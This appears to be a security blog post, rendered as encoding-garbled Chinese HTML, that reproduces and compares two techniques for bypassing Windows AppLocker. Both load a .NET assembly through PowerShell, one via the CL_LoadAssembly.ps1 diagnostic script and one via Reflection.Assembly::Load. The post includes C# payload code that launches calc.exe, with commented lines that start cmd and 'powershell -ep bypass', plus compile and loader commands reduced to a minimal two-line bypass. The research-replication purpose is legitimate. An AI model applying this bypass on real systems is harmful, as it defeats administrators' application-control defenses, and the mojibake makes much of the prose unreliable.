I"Ÿ#<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>æœ€è¿‘bohopsåœ¨æ–‡ç« <a href="https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/">ã€ŠExecuting Commands and Bypassing AppLocker with PowerShell Diagnostic Scriptsã€‹</a>ä¸­ä»‹ç»äº†åˆ©ç”¨CL_LoadAssembly.ps1ç»•è¿‡Applockerçš„æ–¹æ³•ï¼ŒCasey Smithæ—©åœ¨SchmooCon 2015ä¹Ÿæåˆ°äº†è¿™ä¸ªæ–¹æ³•ã€‚æœ¬æ–‡å°†è¦å¯¹ä»–ä»¬çš„ä¸¤ä¸ªå®ç°æ–¹æ³•è¿›è¡Œå¤ç°ï¼Œåˆ†æç»†èŠ‚ï¼Œæ¯”è¾ƒåŒºåˆ«ï¼Œè¿›è€Œæ€»ç»“åˆ©ç”¨æ€è·¯ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>å¤ç°bohopsçš„æ–¹æ³•</li>
  <li>å¤ç°Casey Smithçš„æ–¹æ³•</li>
  <li>ç»†èŠ‚åˆ†æ</li>
  <li>æ€»ç»“åˆ©ç”¨æ€è·¯</li>
</ul>

<h2 id="0x02-å¤ç°bohopsçš„æ–¹æ³•">0x02 å¤ç°bohopsçš„æ–¹æ³•</h2>
<hr />

<p>æµ‹è¯•ç³»ç»Ÿï¼š Win7 x86</p>

<p>å¼€å¯Applockerï¼Œå¼€å¯æ–¹æ³•å¯å‚è€ƒæ–‡ç« ã€ŠBypass Windows AppLockerã€‹</p>

<p>å¼€å‘å·¥å…·: VS2012</p>

<p>1ã€æ–°å»ºc#æ§åˆ¶å°å·¥ç¨‹ConsoleApplication5ï¼Œé»˜è®¤ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using System.Collections.Generic;
using System.Text;

namespace ConsoleApplication5
{
    class Program
    {
        static void Main(string[] args)
        {
        }
    }
}
</code></pre></div></div>

<p>2ã€ä¿®æ”¹ä»£ç ï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>namespace ConsoleApplication5
{
    public class Program
    {
        public static void test()
        {
            System.Diagnostics.Process p = new System.Diagnostics.Process();
            p.StartInfo.FileName = "c:\\windows\\system32\\calc.exe";
//            p.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe";
//            p.StartInfo.Arguments = @"/c ""powershell.exe"" -ep bypass -c $host";   
            p.Start();
        }
        static void Main(string[] args)
        {
            test();
        }
        
    }
}
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p><code class="language-plaintext highlighter-rouge">class Program</code>å‰éœ€è¦æ·»åŠ è®¿é—®ä¿®é¥°ç¬¦<code class="language-plaintext highlighter-rouge">public</code>,æ·»åŠ Method test()åŒæ ·è¦åŠ è®¿é—®ä¿®é¥°ç¬¦<code class="language-plaintext highlighter-rouge">public</code></p>

<p>3ã€ä¿®æ”¹ç›®æ ‡æ¡†æ¶ä¸º.net 2.0ï¼Œç¼–è¯‘ç”ŸæˆConsoleApplication5ï¼Œä¿å­˜åœ¨c:\6ä¸‹</p>

<p>4ã€powershellæ‰§è¡Œå¦‚ä¸‹ä»£ç ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\6\ConsoleApplication5.exe
[ConsoleApplication5.Program]::test()
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p><code class="language-plaintext highlighter-rouge">..\..\..\..\</code>èƒ½å¤Ÿå®šä½åˆ°<code class="language-plaintext highlighter-rouge">c:\</code></p>

<p><code class="language-plaintext highlighter-rouge">[ConsoleApplication5.Program]::test()</code>éœ€è¦åŒç¨‹åºå†…çš„ä»£ç å¯¹åº”ï¼Œæ ¼å¼ä¸ºï¼š<code class="language-plaintext highlighter-rouge">[$namespace.$class]::$fuction()</code></p>

<p>æˆåŠŸæ‰§è¡Œcalc.exeï¼Œç»•è¿‡applocker</p>

<h2 id="0x03-å¤ç°casey-smithçš„æ–¹æ³•">0x03 å¤ç°Casey Smithçš„æ–¹æ³•</h2>
<hr />

<p>æµ‹è¯•ç³»ç»Ÿï¼š Win7 x86</p>

<p>å¼€å¯Applocker</p>

<p>ä»£ç å‚è€ƒåœ°å€ï¼š</p>

<p>https://gist.github.com/netbiosX/5f19a3e8762b6e3fd25782d8c37b1663</p>

<p>æœ¬æ¬¡æµ‹è¯•å¯¹Casey Smithçš„ä»£ç åšç»†å¾®ä¿®æ”¹</p>

<p>1ã€æ–°å»ºæ–‡ä»¶bypass.csï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using System.Collections.Generic;
using System.Text;

public class Program
{
	public static void Main()
	{
		Console.WriteLine("Hey There From Main()");
		//Add any behaviour here to throw off sandbox execution/analysts :)
		
	}
	
}
public class aaa
 {
        public static void bbb()
        {
            System.Diagnostics.Process p = new System.Diagnostics.Process();
            p.StartInfo.FileName = "c:\\windows\\system32\\calc.exe";
//            p.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe";
//            p.StartInfo.Arguments = @"/c ""powershell.exe"" -ep bypass -c notepad.exe";   
            p.Start();
        }
}
</code></pre></div></div>

<p>2ã€ä½¿ç”¨2.0ç‰ˆæœ¬çš„csc.exeå¯¹å…¶ç¼–è¯‘ï¼Œç”Ÿæˆexeæ–‡ä»¶</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x86 /out:bypass.exe bypass.cs
</code></pre></div></div>

<p>3ã€powershellæ‰§è¡Œå¦‚ä¸‹ä»£ç ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$bytes = [System.IO.File]::ReadAllBytes("C:\6\bypass.exe")
[Reflection.Assembly]::Load($bytes)
[aaa]::bbb()
</code></pre></div></div>

<p>æˆåŠŸæ‰§è¡Œcalc.exeï¼Œç»•è¿‡applocker</p>

<h2 id="0x04-å¯¹æ¯”åˆ†æ">0x04 å¯¹æ¯”åˆ†æ</h2>
<hr />

<h3 id="1bohopsçš„æ–¹æ³•">1ã€bohopsçš„æ–¹æ³•</h3>

<p>åŠ è½½æ–‡ä»¶CL_LoadAssembly.ps1ï¼Œä½äº<code class="language-plaintext highlighter-rouge">C:\windows\diagnostics\system\AERO</code></p>

<p>æ–‡ä»¶CL_LoadAssembly.ps1å†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Copyright Â© 2008, Microsoft Corporation. All rights reserved.


# Common library
. .\CL_Utility.ps1

function LoadAssemblyFromNS([string]$namespace)
{
    if([string]::IsNullorEmpty($namespace))
    {
        throw "Invalid namespace"
    }

    [System.Reflection.Assembly]::LoadWithPartialName($namespace) &gt; $null
}

function LoadAssemblyFromPath([string]$scriptPath)
{
    if([String]::IsNullorEmpty($scriptPath))
    {
        throw "Invalid file path"
    }

    $absolutePath = GetAbsolutionPath $scriptPath


[System.Reflection.Assembly]::LoadFile($absolutePath) &gt; $null
}
</code></pre></div></div>

<p>è°ƒç”¨å‡½æ•°<code class="language-plaintext highlighter-rouge">LoadAssemblyFromPath</code>ï¼Œæœ¬è´¨ä¸Šæ˜¯è°ƒç”¨<code class="language-plaintext highlighter-rouge">[System.Reflection.Assembly]::LoadFile($absolutePath)</code></p>

<h3 id="2casey-smithçš„æ–¹æ³•">2ã€Casey Smithçš„æ–¹æ³•</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$bytes = [System.IO.File]::ReadAllBytes("C:\6\bypass.exe")
[Reflection.Assembly]::Load($bytes)
[aaa]::bbb()
</code></pre></div></div>

<p>è°ƒç”¨äº†<code class="language-plaintext highlighter-rouge">[Reflection.Assembly]::Load($bytes)</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p><code class="language-plaintext highlighter-rouge">[Reflection.Assembly]</code>æ˜¯<code class="language-plaintext highlighter-rouge">[System.Reflection.Assembly]</code>çš„ç®€å†™</p>

<h3 id="3å¯¹æ¯”">3ã€å¯¹æ¯”</h3>

<p>ä¸¤ç§æ–¹æ³•åˆ†åˆ«ä½¿ç”¨äº†Assemblyçš„LoadFileå’ŒLoadæ–¹æ³•ï¼Œä¸¤è€…çš„åŒºåˆ«åœ¨è¿™é‡Œçš„å½±å“å¾®ä¹å…¶å¾®</p>

<p>å¯ä»¥åˆ†åˆ«ä½¿ç”¨LoadFileå’ŒLoadæ–¹æ³•å»è°ƒç”¨ä»¥ä¸Šä¸¤ç§æ–¹æ³•ç”Ÿæˆçš„ä¸¤ä¸ªexe(åˆ†åˆ«ç”±vs2012å’Œcsc.exeç¼–è¯‘)</p>

<p>äº’æ¢åçš„ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$bytes = [System.IO.File]::ReadAllBytes("C:\6\ConsoleApplication5.exe")
[Reflection.Assembly]::Load($bytes)
[ConsoleApplication5.Program]::test()
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\6\bypass.exe
[aaa]::bbb()
</code></pre></div></div>

<p>ç»è¿‡ä»¥ä¸Šæµ‹è¯•ï¼Œå¯ä»¥æ¨æ–­å¦‚ä¸‹ä¸¤æ®µä»£ç ç­‰ä»·ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\6\bypass.exe
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Reflection.Assembly]::LoadFile("C:\6\bypass.exe")
</code></pre></div></div>

<p>ä¾ç…§ä»¥ä¸Šæ¨æ–­ï¼Œæˆ‘ä»¬å¯ä»¥å¯¹Casey Smithçš„åˆ©ç”¨ä»£ç è¿›è¡Œç²¾ç®€ï¼Œæœ€çŸ­çš„powershellå®ç°ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Reflection.Assembly]::LoadFile("C:\6\bypass.exe")
[aaa]::bbb()
</code></pre></div></div>

<h3 id="4é€‚ç”¨æ¡ä»¶">4ã€é€‚ç”¨æ¡ä»¶</h3>

<p>å®é™…æµ‹è¯•ï¼Œä»¥ä¸Šä¸¤ç§æ–¹æ³•é€‚ç”¨.net 2.0ï¼Œå¦‚æœæ¢æˆ.net 4.0ç¼–è¯‘ï¼Œåœ¨æ‰§è¡Œæ—¶ä¼šæŠ¥é”™</p>

<h2 id="0x05-å°ç»“">0x05 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡åˆ†åˆ«å¯¹bohopså’ŒCasey Smithçš„æ–¹æ³•åšäº†æµ‹è¯•ï¼Œæ‰¾åˆ°æ–¹æ³•çš„æœ¬è´¨æ˜¯åˆ†åˆ«ä½¿ç”¨äº†Assemblyçš„LoadFileå’ŒLoadæ–¹æ³•ã€‚ç»å®é™…æµ‹è¯•ï¼Œå¾—å‡ºè¯¥æ–¹æ³•åªé€‚ç”¨äº.Net 2.0ç¯å¢ƒ</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET